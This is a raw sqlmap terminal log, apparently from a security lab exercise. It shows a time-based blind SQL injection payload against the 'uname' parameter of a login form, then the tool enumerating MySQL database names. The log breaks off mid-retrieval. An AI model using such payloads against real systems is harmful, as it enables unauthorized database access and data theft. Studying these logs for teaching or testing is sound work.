        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9.10#stable}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:21:40 /2026-02-20/

[10:21:40] [INFO] parsing HTTP request from '/home/kali/Desktop/login_request.txt'
[10:21:40] [INFO] resuming back-end DBMS 'mysql' 
[10:21:40] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=test' AND (SELECT 2927 FROM (SELECT(SLEEP(5)))lyCd)-- Atif&pass=test&submit=Enter
---
[10:21:41] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 12.10 or 13.04 or 12.04 (Precise Pangolin or Raring Ringtail or Quantal Quetzal)
web application technology: PHP 5.3.10, Apache 2.2.22
back-end DBMS: MySQL >= 5.0.12
[10:21:41] [INFO] fetching database names
[10:21:41] [INFO] fetching number of databases

[10:21:41] [INFO] retrieved: [10:21:41] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[10:21:48] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
5

[10:21:53] [INFO] retrieved: [10:21:58] [INFO] adjusting time delay to 2 seconds due to good response times
information_schema

[10:23:54] [INFO] retrieved: INFOSEC100

[10:24:44] [INFO] retrieved: eclass

[10:25:17] [INFO] retrieved: mysql

[10:25:50] [INFO] retrieved: per